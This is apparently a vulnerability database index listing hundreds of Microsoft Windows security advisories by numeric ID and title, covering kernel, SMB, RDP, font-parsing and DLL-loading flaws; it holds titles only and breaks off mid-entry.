Windows netapi32.dll Remote Administration Protocol Malformed RAP Request Parsing Remote DoS [84593] Microsoft Multiple Product Windows Common Controls TabStrip ActiveX (MSCOMCTL.OCX) Document Handling Arbitrary Code Execution [83751] Microsoft Windows Terminal Services LCA Issued Certificates Arbitrary Binary Signing Weakness [83750] Microsoft Windows Gadgets Unspecified Remote Code Execution [83660] Microsoft Windows TLS Protocol HTTPS Session Decryption Information Disclosure [83659] Microsoft Windows win32k.sys Keyboard Layout Handling Local Privilege Escalation [83658] Microsoft Windows win32k.sys Hook Procedure Creation Incorrect Type Handling Local Privilege Escalation [83657] Microsoft Windows ADO Cachesize Data Access Components Memory Object Handling Overflow [83656] Microsoft Windows File / Directory Name Handling Remote Code Execution [83453] Microsoft Windows ProfileList Registry Key Permission Weakness User Profile Subversion [83169] Microsoft Windows NT telnetd Service Port Scan Remote DoS [83126] Microsoft Windows NT Registry Plaintext Service Password Local Disclosure [82928] Microsoft Windows atmfd.dll OpenType Font (OTF) File Handling DoS [82858] Microsoft Windows win32k.sys Thread Creation Attempt Handling Race Condition Local Privilege Escalation [82857] Microsoft Windows TrueType Font Loading Font Resource Reference Counter Handling Local Overflow [82856] Microsoft Windows win32k.sys Clipboard Format Atom Name Handling Local Privilege Escalation [82855] Microsoft Windows win32k.sys String Atom Class Name Handling Local Privilege Escalation (2012-1865) [82854] Microsoft Windows win32k.sys String Atom Class Name Handling Local Privilege Escalation (2012-1864) [82851] Microsoft Windows Remote Desktop Protocol (RDP) Memory Object Handling Remote Code Execution [82850] Microsoft Windows User Mode Scheduler Memory Corruption Local Privilege Escalation [82849] Microsoft Windows BIOS Memory Handling ROM Corruption Local Privilege Escalation [82693] Microsoft Windows Terminal Server Licensing Service MD5 Hash Collision Code Signing Spoofing [82605] Microsoft Windows Explorer Crafted Subdirectory Parent Directory Deletion Local DoS [82604] Microsoft Windows Media Player Streamed Broadcast Handling Remote Overflow [82505] Microsoft Windows IE Instances Overflow Group Policy Bypass [82491] Microsoft Windows UTF Character Set File Extension Spoofing Weakness [81736] Microsoft Windows GDI+ EMF File Record Handling Remote Code Execution [81735] Microsoft Windows Partition Manager (partmgr.sys) PnP Configuration Manager Function Call Handling Local Privilege Escalation [81730] Microsoft Windows tcpip.sys Outbound Packet Filtering Windows Firewall Bypass [81729] Microsoft Windows tcpip.sys Double-free IPv6 Address Binding Parsing Local Privilege Escalation [81720] Microsoft Windows t2embed.dll Module TTF File Handling Remote Code Execution [81717] Microsoft Windows win32k.sys Scrollbar Calculation Handling Local Privilege Escalation [81716] Microsoft Windows win32k.sys Keyboard Layout File Handling Local Privilege Escalation [81715] Microsoft Windows win32k.sys Windows and Messages Handling Local Privilege Escalation [81699] Microsoft Windows xxxCreateWindowEx() Function Invalid Memory Access Local DoS [81135] Microsoft Windows Authenticode Signature Verification Functionality Signed Portable Executable File Digest Validation Remote Code Execution [80005] Microsoft Windows DNS Server Domain Resource Record Query Parsing Remote DoS [80004] Microsoft Windows Remote Desktop Protocol Terminal Server RDP Packet Parsing Remote DoS [80003] Microsoft Windows DirectWrite Unicode Character Parsing Remote DoS [80002] Microsoft Windows win32k.sys PostMessage() Function Local Privilege Escalation [80000] Microsoft Windows Remote Desktop Protocol Array Element Loading Handling Double-free Remote Code Execution [79442] Microsoft Windows Server 2008 DNS Server Service Cache Update Policy Deleted Domain Name Resolving Weakness [79269] Microsoft Windows win32k.sys Use-after-free Keyboard Layout Memory Dereference Local Privilege Escalation [79259] Microsoft Windows C Run-Time Library msvcrt.dll Meta File Handling Remote Overflow [79253] Microsoft Windows Ancillary Function Driver (afd.sys) User Mode Input Parsing Local Privilege Escalation [79252] Microsoft Windows Ancillary Function Driver (afd.sys) AfdPoll User Mode Input Parsing Local Privilege Escalation [79117] Microsoft Windows Program Group Path Subversion Arbitrary DLL Injection Code Execution [78759] Microsoft Windows ICMPv6 Echo Request Remote Promiscuous Mode Detection [78212] Microsoft Windows Object Packager Path Subversion packager.exe Loading Remote Code Execution [78211] Microsoft Windows Line21 DirectShow Filter Media File Handling Remote Code Execution [78210] Microsoft Windows Multimedia Library (winmm.dll) MIDI File Handling Remote Code Execution [78209] Microsoft Windows Ntdll.dll Structured Exception Handling Tables Loading SafeSEH Security Bypass [78207] Microsoft Windows Embedded ClickOnce Application Office File Handling Remote Code Execution [78206] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Unicode Character Parsing Local Privilege Escalation [78010] Microsoft Windows Phone Text Message Parsing Remote DoS [77908] Microsoft Windows win32k.sys Safari IFRAME Height Attribute Handling Remote Memory Corruption [77667] Microsoft Windows Active Directory Query Parsing Remote Overflow [77666] Microsoft Windows Kernel Exception Handler Local Privilege Escalation [77663] Microsoft Windows Object Linking and Embedding (OLE) Object File Handling Remote Code Execution [77662] Microsoft Windows CSRSS Device Event Message Parsing Local Privilege Escalation [77660] Microsoft Windows Media Player / Center DVR-MS File Handling Remote Memory Corruption [77620] Microsoft Windows IE Sandbox Restriction Bypass Local Privilege Escalation [77262] Microsoft Windows win32k.sys Driver Keyboard Layout File Handling Local DoS [77213] Microsoft Windows AppLocker Rule Weakness Local Access Restriction Bypass [76902] Microsoft Windows Active Directory LDAPS CRL Handling Weakness Authentication Bypass [76901] Microsoft Windows Mail / Windows Meeting Space Path Subversion Arbitrary DLL Injection Code Execution [76900] Microsoft Windows Malformed TrueType Font Parsing DoS [76899] Microsoft Windows TCP/IP Reference Counter Crafted UDP Packet Stream Remote Overflow [76843] Microsoft Windows Win32k TrueType Font Handling Privilege Escalation [76232] Microsoft Windows Ancillary Function Driver afd.sys Local Privilege Escalation [76231] Microsoft Windows Active Accessibility Path Subversion Arbitrary DLL Injection Code Execution [76221] Microsoft Windows win32k.sys Driver Use-after-free Driver Object Handling Arbitrary Code Execution [76220] Microsoft Windows win32k.sys Driver .fon Font File Handling Overflow [76219] Microsoft Windows win32k.sys Driver Type Translation TrueType Font File Handling DoS [76218] Microsoft Windows win32k.sys Driver NULL Dereference Unspecified Arbitrary Code Execution [76205] Microsoft Windows Media Center Path Subversion Arbitrary DLL Injection Code Execution [75473] Microsoft Windows Explorer shmedia.dll AVI File Handling Remote DoS [75444] Microsoft Windows WINS Loopback Interface Crafted Packet Local Privilege Escalation [75382] Microsoft Windows Shell Extensions Path Subversion Arbitrary DLL Injection Code Execution [75260] Microsoft Windows IPv6 Router Advertisement (RA) MitM Weakness [75199] Intel G41 Driver for Microsoft Windows Unspecified Page Handling DoS [75197] NVIDIA Geforce 310 Driver on Microsoft Windows Unspecified Page Handling DoS [75195] Microsoft Windows GPU Support Functionality Unspecified Page Handling DoS [74483] Microsoft Windows TCP/IP Stack (Tcpip.sys) QoS URL Request Parsing Remote DoS [74482] Microsoft Windows TCP/IP Stack (Tcpip.sys) ICMP Message Parsing Remote DoS [74408] Microsoft Windows Data Access Tracing Component Path Subversion Arbitrary DLL Injection Code Execution [74407] Microsoft Windows Kernel File Metadata Handling Remote DoS [74406] Microsoft Windows Remote Desktop Web Access Logon Page Unspecified XSS [74405] Microsoft Windows Remote Desktop Protocol RDP Packet Parsing Remote DoS [74402] Microsoft Windows Remote Access Service NDISTAPI Driver User Input Validation Weakness Local Privilege Escalation [74401] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Inter-Process Device Event Message Parsing Local Privilege Escalation [74400] Microsoft Windows DNS Service Non-Existent Domain Query Parsing Remote DoS [74399] Microsoft Windows DNS Service NAPTR Query Parsing Overflow [74265] Microsoft Windows CSRSS winsrv.dll SrvGetConsoleTitle() Function Type Casting Weakness Local DoS [73880] ArcSight Connector Appliance Windows Event Log SmartConnector Microsoft OS Version Field XSS [73799] Microsoft Windows Bluetooth Driver Object Handling Remote Code Execution [73796] Microsoft Windows CSRSS SrvSetConsoleLocalEUDC() Function NULL Page Data Write Local Privilege Escalation [73795] Microsoft Windows CSRSS SrvWriteConsoleOutputString() Function Local Overflow [73794] Microsoft Windows CSRSS SrvWriteConsoleOutput() Function Local Overflow [73793] Microsoft Windows CSRSS SrvSetConsoleNumberOfCommand() Function Kernel Memory Access Local Privilege Escalation [73792] Microsoft Windows CSRSS AllocConsole() Function Multiple Console Object Orphaning Local Privilege Escalation [73791] Microsoft Windows win32k.sys Driver Function Argument Validation Unspecified Local Information Disclosure [73790] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1888) [73789] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1887) [73788] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1885) [73787] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1881) [73786] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1880) [73785] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1875) [73784] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1884) [73783] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1883) [73782] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1882) [73781] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1879) [73780] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1878) [73779] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1877) [73778] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1876) [73777] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1874) [73654] Microsoft Windows fxsst.dll Path Subversion DLL Injection Code Execution [73602] Microsoft Windows nsiproxy.sys Local DoS [72959] Microsoft Windows Object Linking and Embedding (OLE) Automation Remote Code Execution [72955] Microsoft Windows Ancillary Function Driver Local Privilege Escalation [72937] Microsoft Windows Active Directory Certificate Services Web Enrollment XSS [72936] Microsoft Windows Server Service Crafted SMB Request Parsing Remote DoS [72935] Microsoft Windows MHTML Mime-Formatted Request Unspecified XSS [72930] Microsoft Windows Hyper-V VMBus vmswitch.sys Crafted Packet Cross-guest Local DoS [72929] Microsoft Windows Distributed File System (DFS) Referral Response Handling Remote DoS [72928] Microsoft Windows Distributed File System (DFS) Response Handling Memory Corruption Remote Code Execution [72919] Microsoft Windows OpenType Font (OTF) Pointer Validation Arbitrary Code Execution [72676] Microsoft Windows Kernel-mode GS Cookie Entropy Weakness [72672] Microsoft Windows AppFix systest.sdb Local DoS [72670] Microsoft Windows Server 2003 ActiveDirectory BROWSER ELECTION Remote Overflow [72234] Microsoft Windows WINS Service Failed Response Data Reuse Memory Corruption Remote Code Execution [71788] Microsoft Windows Messenger ActiveX Unspecified Remote Code Execution [71781] Microsoft Windows SMB Transaction Parsing Unspecified Remote Code Execution [71780] Microsoft Windows DNS Client Service LLMNR Query Processing Remote Code Execution [71779] Microsoft Windows/Office GDI+ (gdiplus.dll) EMF File Processing Overflow [71778] Microsoft Windows Wordpad Word 97 Converter sprmTTextFlow / sprmTSplit PRLs Parsing Memory Corruption [71776] Microsoft Windows OpenType Font (OTF) Driver Font Processing Overflow [71775] Microsoft Windows Fax Cover Page Editor fxscover.exe Text Element Handling Memory Corruption [71774] Microsoft Windows JScript / VBScript Engine Scripting Memory Reallocation Overflow [71773] Microsoft Windows Common Internet File System (CIFS) Malformed Browser Message Handling Overflow [71772] Microsoft Windows SMB Client Response Parsing Unspecified Remote Code Execution [71757] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1242) [71756] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1241) [71755] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1240) [71754] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1239) [71753] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1238) [71752] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1237) [71751] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1236) [71750] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1235) [71749] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1234) [71748] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0675) [71747] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0674) [71746] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0672) [71745] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0671) [71744] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0670) [71743] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0667) [71742] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0666) [71741] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0665) [71740] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0662) [71739] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1233) [71738] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1232) [71737] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1231) [71736] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1230) [71735] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1229) [71734] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1228) [71732] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1227) [71731] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1226) [71730] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1225) [71729] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0677) [71728] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0676) [71727] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0673) [71671] Microsoft Windows afd.sys 120CFh IOCTL Handling Local DoS [71667] Microsoft Windows SetDllDirectory Function Binary Planting Protection Bypass [71016] Microsoft Windows Media Player / Center .dvr-ms File Handling Arbitrary Code Execution [71015] Microsoft Windows DirectShow Path Subversion Arbitrary DLL Injection Code Execution [71014] Microsoft Windows Remote Desktop Client Path Subversion Arbitrary DLL Injection Code Execution [70885] Microsoft Windows LSASS Authentication Request Privilege Escalation [70881] Microsoft Windows SMB Browser Election Request Server Name String Overflow [70835] Microsoft Windows Kerberos Authentication Downgrade Weakness [70834] Microsoft Windows Kerberos Unkeyed Checksum Hashing Mechanism Service Ticket Forgery [70827] Microsoft Windows JScript / VBScript Scripting Engine Memory Corruption Information Disclosure [70826] Microsoft Windows CSRSS Logoff Process Termination Local Information Disclosure [70825] Microsoft Windows Server Active Directory Server Principal Name (SPN) Handling Remote DoS [70823] Microsoft Windows Kernel Trace Event (WmiTraceMessageVa) Handling Integer Truncation Local Privilege Escalation [70819] Microsoft Windows Kernel Unspecified User Input Validation Weakness Local Privilege Escalation (2011-0087) [70818] Microsoft Windows Kernel Unspecified User Input Validation Weakness Local Privilege Escalation (2011-0086) [70817] Microsoft Windows Kernel Class Improper Pointer Validation Unspecified Local Privilege Escalation [70816] Microsoft Windows Kernel Window Class Pointer Confusion Unspecified Local Privilege Escalation [70814] Microsoft Windows Kernel Unspecified Memory Corruption Local Privilege Escalation [70693] Microsoft Windows MHTML Protocol Handler MIME Formatted Request XSS [70689] Microsoft Windows USB Human Interface Device Functionality Warning Weakness Arbitrary Program Execution [70390] Microsoft Windows IPv6 Stack Neighbor Discovery Router Advertisement Message Saturation Remote DoS [70263] Microsoft Windows Bitmap Thumbnail shimgvw.dll CreateSizedDIBSECTION() Function biClrUsed Parameter Overflow [70126] Microsoft Windows Fax Cover Page Editor CDrawPoly::Serialize() Function Overflow [70000] Microsoft Windows Remote Access Phonebook (rasphone.exe) Path Subversion Arbitrary EXE Injection Code Execution [69824] Microsoft Windows Consent User Interface Local Privilege Escalation [69823] Microsoft Windows Routing and Remote Access NDProxy Unspecified Local Code Execution [69822] Microsoft Windows OpenType Font Driver CMAP Table Parsing Arbitrary Code Execution [69821] Microsoft Windows OpenType Font Driver Pointer Handling Double-free Arbitrary Code Execution [69820] Microsoft Windows OpenType Font Driver Index Array Unspecified Code Execution [69818] Microsoft Windows Hyper-V VMBus Crafted Packet Local DoS [69816] Microsoft Windows BranchCache Path Subversion Arbitrary DLL Injection Code Execution [69802] Microsoft Windows win32k.sys Cursor Linking Unspecified Local Privilege Escalation [69801] Microsoft Windows win32k.sys WriteAV Unspecified Local Privilege Escalation [69800] Microsoft Windows win32k.sys Unspecified Double-free Local Privilege Escalation [69799] Microsoft Windows win32k.sys PFE Pointer Double-free Local Privilege Escalation [69798] Microsoft Windows win32k.sys Unspecified Memory Corruption Local Privilege Escalation [69797] Microsoft Windows win32k.sys Unspecified Local Overflow [69501] Microsoft Windows win32k.sys Driver GreEnableEUDC() Function Local Overflow [69465] Microsoft Windows win32k.sys NtGdiEnableEUDC Local Overflow Privilege Escalation [68946] Microsoft Windows DAO Object Library Path Subversion Arbitrary DLL Injection Code Execution [68933] Microsoft Windows Shell32.dll Environment Variable Expansion SetDllDirectory Function Bypass [68857] Microsoft Windows XP wscript.exe Path Subversion Arbitrary DLL Injection Code Execution [68560] Microsoft Windows SChannel TLSv1 Crafted Client Certificate Request DoS [68559] Microsoft Windows OpenType Font Parsing Unspecified Remote Code Execution [68558] Microsoft Windows OpenType Malformed Font Validation Remote Code Execution [68557] Microsoft Windows Media Player Reload Operation Object Deallocation Memory Corruption [68554] Microsoft Windows Server 2008 Shared Cluster Disks Addition Default Permission Weakness [68553] Microsoft Windows t2embed.dll Embedded OpenType Font Parsing hdmx Record Parsing Overflow [68552] Microsoft Windows win32k.sys Driver Keyboard Layout Loading Local Privilege Escalation [68551] Microsoft Windows win32k.sys Driver Window Class Data Validation Local Privilege Escalation [68550] Microsoft Windows Media Player Network Sharing Service RTSP Use-after-free Remote Code Execution [68549] Microsoft Windows Common Control Library (comctl32.dll) Third-party SVG Content Handling Overflow [68518] Microsoft Windows on 32-bit Task Scheduler Crafted Application Local Privilege Escalation [68517] Microsoft Windows on 32-bit win32k.sys Keyboard Layout Loading Local Privilege Escalation [67987] Microsoft Windows LSASS Implementation Malformed LDAP Message Handling Remote Overflow [67986] Microsoft Windows Client/Server Runtime Subsystem (CSRSS) Local Privilege Escalation [67985] Microsoft Windows MPEG-4 Codec Content Parsing Overflow [67983] Microsoft Windows WordPad Text Converters Document Parsing Memory Corruption [67784] Microsoft Windows Media Encoder Path Subversion Arbitrary DLL Injection Code Execution [67783] Microsoft Windows SDK for Windows 7 / .NET Framework 4 GraphEdit Path Subversion Arbitrary DLL Injection Code Execution [67722] Microsoft Windows Internet Connection Signup Wizard Path Subversion Arbitrary DLL Injection Code Execution [67600] Microsoft Windows Media Player Path Subversion Arbitrary DLL Injection Code Execution [67599] Microsoft Windows Live Messenger Path Subversion Arbitrary DLL Injection Code Execution [67553] Microsoft Windows Contacts Path Subversion Arbitrary DLL Injection Code Execution [67552] Microsoft Windows Internet Communication Settings Path Subversion Arbitrary DLL Injection Code Execution [67551] Microsoft Windows Indeo Codec (ac25_32.ax) Path Subversion Arbitrary DLL Injection Code Execution [67548] Microsoft Windows Vista BitLocker Drive Encryption Path Subversion Arbitrary DLL Injection Code Execution [67543] Microsoft Windows Movie Maker Path Subversion Arbitrary OCX Injection Code Execution [67535] Microsoft Windows Progman Group Converter Path Subversion Arbitrary DLL Injection Code Execution [67500] Microsoft Windows Live Mail Path Subversion Arbitrary DLL Injection Code Execution [67408] Microsoft Windows Ipv4SetEchoRequestCreate() Interruption DoS [67083] Microsoft Windows TAPI Server (TAPISRV) Service Isolation Bypass Local Privilege Escalation [67005] Microsoft Windows TCP/IP Implementation IppSortDestinationAddresses() Function Local Overflow [67004] Microsoft Windows Malformed IPv6 Extension Header Handling Remote Memory Corruption DoS [66990] Microsoft Windows Kernel Object ACL Validation SeObjectCreateSaclAccessBits() Local DoS [66989] Microsoft Windows Kernel Object Initialization Error Handling Local Privilege Escalation [66988] Microsoft Windows Kernel Thread Creation Handling NtCreateThread() Local Privilege Escalation [66987] Microsoft Windows SChannel Malformed Certificate Request Remote Code Execution [66986] Microsoft Windows Movie Maker Imported Projector File (.MSWMM) String Parsing Overflow [66985] Microsoft Windows MPEG Layer-3 Audio Stream Decoding Overflow [66984] Microsoft Windows iccvid.dll VIDC (Cinepak) Codec Decompression Arbitrary Code Execution [66983] Microsoft Windows win32k.sys Driver xxxCreateWindowsEx hParent Value Handling Local Privilege Escalation [66982] Microsoft Windows win32k.sys Driver User Mode Input Unspecified Local Privilege Escalation [66981] Microsoft Windows win32k.sys Driver User Mode Copy Memory Allocation Local Privilege Escalation [66979] Microsoft Windows win32k.sys Driver GreStretchBltInternal() Handling Local DoS [66978] Microsoft Windows Tracing Feature for Services Registry String Handling Memory Corruption Local Privilege Escalation [66977] Microsoft Windows Tracing Feature for Services Registry Key ACL Local Privilege Escalation [66976] Microsoft Windows SMB Server Compounded Request Handling Stack Exhaustion Remote DoS [66975] Microsoft Windows SMB Server Crafted Packet Handling Unspecified Remote DoS [66974] Microsoft Windows SMB Server SMB_COM_TRANSACTION2 Request Handling Remote Code Execution [66934] Microsoft Windows win32k.sys CreateDIBPalette() Function Local Overflow [66387] Microsoft Windows Shell LNK File Parsing Arbitrary Command Execution [66003] Microsoft Windows win32k.sys NtUserCheckAccessForIntegrityLevel Use-After-Free Local Privilege Escalation [66001] Microsoft Windows mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Local Pointer Disclosure [65529] Microsoft Windows Help and Support Center sysinfo/sysinfomain.htm svr Parameter XSS [65264] Microsoft Windows hcp:// Protocol Handler MPC::HexToNum() Function String Miscalculation Arbitrary Command Execution [65225] Microsoft Windows Kernel-Mode Driver Window Creation Local Privilege Escalation [65224] Microsoft Windows Kernel-Mode Driver Win32k.sys GetDCEx() Function Device Contexts (DC) Handling Local Privilege Escalation [65223] Microsoft Windows Kernel-Mode Driver TrueType Font Parsing Local Privilege Escalation [65222] Microsoft Windows MJPEG Media Decompression Unspecified Remote Code Execution [65221] Microsoft Windows Media Decompression Unspecified Remote Code Execution [65219] Microsoft Windows / Office COM Object Instantiation Validation Remote Code Execution [65217] Microsoft Windows OpenType Compact Font Format (CFF) Driver Privilege Escalation [64928] Microsoft Windows SMB Client Transaction Response Handling Memory Corruption (2010-0476) [64927] Microsoft Windows SMB Client Transaction SMB_COM_TRANSACTION2 Response Handling Memory Corruption [64926] Microsoft Windows SMB Client Unspecified Response Handling Memory Corruption (2010-0477) [64925] Microsoft Windows SMB Client Unspecified Response Handling Memory Corruption (2010-0269) [64731] Microsoft Windows Canonical Display Driver (cdd.dll) Unspecified Memory Corruption [64530] Microsoft Outlook Express / Windows Mail STAT Response Overflow [64391] Microsoft Windows Group Policy Management Editor Account Password Removal Weakness [64341] Microsoft Windows Unspecified SMB Negotiation Remote DoS [64340] Microsoft Windows RRAS InterfaceAdjustVLSPointers Null Dereference Remote DoS [64058] Microsoft Windows win32k.sys SfnINSTRING() Local DoS [64057] Microsoft Windows win32k.sys Driver SfnLOGONNOTIFY() Function Local Privilege Escalation [63765] Microsoft Windows Media Player ActiveX fourCC Compression Code Codec Retrieval Arbitrary Code Execution [63749] Microsoft Windows MPEG Layer-3 Audio Decoder AVI File Handling Overflow [63747] Microsoft Windows ISATAP Component IPv6 Tunneled Packet IP Address Spoofing Weakness [63746] Microsoft Windows Authenticode Signature Verification Cabview Manipulation Privilege Escalation [63745] Microsoft Windows Authenticode WinVerifyTrust Signature Manipulation Validation Bypass [63739] Microsoft Windows SMTP / Exchange Server Malformed Command Sequence Remote Information Disclosure [63738] Microsoft Windows SMTP / Exchange Server DNS Mail Exchanger (MX) Resource Record Handling Remote DoS [63736] Microsoft Windows Kernel Symbolic Link Value Processing Unspecified Local DoS [63735] Microsoft Windows Kernel Exception Handling Unspecified Local DoS [63733] Microsoft Windows Kernel Registry Link Symbolic Link Extraction Local Privilege Escalation [63732] Microsoft Windows Kernel Malformed Image Handling Local DoS [63731] Microsoft Windows Kernel Registry Hive Symbolic Link Creation Local Privilege Escalation [63730] Microsoft Windows Kernel Registry Key Validation Unspecified Local DoS [63729] Microsoft Windows Kernel Virtual Path Parsing Local DoS [63728] Microsoft Windows Unspecified Kernel System Call Registry Handling Local DoS [63726] Microsoft Windows Media Unicast Service Transport Packet Handling Remote Overflow [63468] Microsoft Windows ANI Parser BITMAPINFO Header Crafted biClrUsed Value DoS [63231] Microsoft Windows Media Player Crafted AVI File Colorspace Conversion Memory Corruption [62855] Microsoft Windows HTML Help Control ActiveX chm File Handling Arbitrary Code Execution [62811] Microsoft Windows Movie Maker / Producer IsValidWMToolsStream() Function Project File (.MSWMM) Handling Overflow [62756] Microsoft Windows VBScript MsgBox() Function helpfile Argument Arbitrary Command Execution [62660] Microsoft Windows Unspecified API Argument Validation Local DoS [62652] Microsoft Windows Media Player Crafted MPG File Handling Overflow DoS [62637] Microsoft Windows Malformed TCP SYN Packet Remote DoS (Blat) [62632] Microsoft Windows VBScript MsgBox() Function HLP File Arbitrary Command Execution [62259] Microsoft Windows Kernel Double-free Unspecified Local Privilege Escalation [62258] Microsoft Windows Kerberos Ticket-Granting-Ticket Renewal Request NULL Dereference Remote DoS [62257] Microsoft Windows DirectShow AVI File Decompression Overflow [62256] Microsoft Windows SMB Server Crafted Network Message Remote Code Execution [62255] Microsoft Windows SMB Server Crafted Packet Handling Remote DoS [62254] Microsoft Windows SMB Server Crafted Packet Handling NULL Dereference Remote DoS [62253] Microsoft Windows SMB Server NTLM Authentication Nonce Entropy Weakness [62252] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Session Termination Weakness Local Privilege Escalation [62251] Microsoft Windows Server 2008 Hyper-V Crafted Instruction Sequence DoS [62250] Microsoft Windows TCP/IP Stack ICMPv6 Router Advertisement Packet Handling Remote Code Execution [62249] Microsoft Windows TCP/IP Stack ESP Over UDP Header MDL Fragmentation Remote Code Execution [62248] Microsoft Windows TCP/IP Stack ICMPv6 Route Information Packet Handling Remote Code Execution [62247] Microsoft Windows TCP/IP Selective Acknowledgment (SACK) Value Handling Remote DoS [62245] Microsoft Windows Shell Handler ShellExecute API Crafted URL Arbitrary Command Execution [62244] Microsoft Windows SMB Client Negotiate Protocol Response Handling Remote Code Execution [62243] Microsoft Windows SMB Client Packet Handling Race Condition Remote Privilege Escalation [62242] Microsoft Windows Paint JPEG Image Decoding Overflow [61854] Microsoft Windows Virtual DOS Machine (VDM) Subsystem #GP Trap Handler (nt!KiTrap0D) Local Privilege Escalation [61676] Microsoft Windows Live Messenger msnmsgr.exe ActiveX (msgsc.14.0.8089.726.dll) ViewProfile Method MSN Messenger Session Remote DoS [61651] Microsoft Windows Embedded OpenType Font Engine LZCOMP Decompressor Font Handling Arbitrary Code Execution [61037] Microsoft Windows Indeo Codec Crafted Media Content Arbitrary Code Execution (2009-4312) [61036] Microsoft Windows Indeo Codec Crafted Media Content Arbitrary Code Execution (2009-4311) [60858] Microsoft Windows Intel Indeo32 Codec (ir32_32.dll) IV32 FourCC Code Handling Heap Corruption [60857] Microsoft Windows Indeo Codec Unspecified Memory Corruption [60856] Microsoft Windows Intel Indeo41 Codec IV41 Stream Video Decompression Overflow [60855] Microsoft Windows Intel Indeo41 Codec IV41 movi Record Handling Overflow [60836] Microsoft Windows Active Directory Federation Services (ADFS) Request Header Handling Remote Code Execution [60835] Microsoft Windows Active Directory Federation Services (ADFS) Single Sign-on Spoofing [60833] Microsoft Windows Internet Authentication Service Crafted MS-CHAP v2 Message Remote Authentication Bypass [60832] Microsoft Windows Internet Authentication Service Protected Extensible Authentication Protocol (PEAP) Message Handling Remote Memory Corruption [60831] Microsoft Windows Local Security Authority Subsystem (LSASS) ISAKMP Message Handling Resource Exhaustion Remote DoS [60368] Microsoft Windows Terminal Services msgina.dll Unrestricted Resource Lock Remote DoS [60329] Microsoft Windows 2000 NetBIOS Continuation Packet Remote DoS [60273] Microsoft Windows NT Virtual DOS Machine 16-bit Executable Permission Bypass Local Privilege Escalation [60225] Microsoft Windows XP System Restore Directory ACL Weakness Local Privilege Escalation [60210] Microsoft Windows Active Directory Malformed LDAP Client Request Remote DoS [60206] Microsoft Windows Fast User Switching (FUS) Arbitrary User Process Listing Disclosure [60145] Microsoft Windows NT cmd.exe CD Command Arbitrary Local Code Execution [60057] Microsoft Windows File Protection (WFP) Catalog File (.CAT) Modification Hash Code Comparison Bypass [59957] Microsoft Windows SMB Response Handling Remote DoS [59886] Microsoft Exchange Malformed Microsoft Remote Procedure Call (MSRPC) Remote DoS [59869] Microsoft Windows Win32k Table of Directory Entry Building Font Code Parsing Remote Code Execution [59868] Microsoft Windows Win32k GDI Kernel Component Unspecified Local Privilege Escalation [59867] Microsoft Windows Win32k Unspecified Kernel System Call Local Privilege Escalation [59865] Microsoft Windows Web Services on Devices API (WSDAPI) Message Header Handling Memory Corruption [59856] Microsoft Windows Active Directory Malformed LDAP Request Stack Exhaustion Remote DoS [59738] Microsoft Windows 